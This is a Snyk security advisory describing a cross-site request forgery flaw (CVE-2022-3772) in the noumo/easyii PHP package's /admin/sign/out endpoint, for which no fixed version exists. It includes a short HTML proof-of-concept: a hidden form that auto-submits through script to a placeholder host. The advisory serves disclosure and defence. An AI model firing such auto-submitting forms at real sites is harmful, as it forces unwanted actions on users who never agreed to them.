Cross-Site Request Forgery (CSRF) Affecting noumo/easyii package, versions >=0.0.0


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Cross-Site Request Forgery (CSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PHP-NOUMOEASYII-6674146
  • published26 Apr 2024
  • disclosed31 Oct 2022
  • creditUnknown

Introduced: 31 Oct 2022

CVE-2022-3772  (opens in a new tab)
CWE-352  (opens in a new tab)

How to fix?

There is no fixed version for noumo/easyii.

Overview

Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) via the manipulation of the /admin/sign/out file. An attacker can launch an attack remotely.

PoC


<form method='GET' action='http://example.com/admin/sign/out' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='criticaltoggle' value='true'>
  <input style="display:none;" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

References

CVSS Scores

version 3.1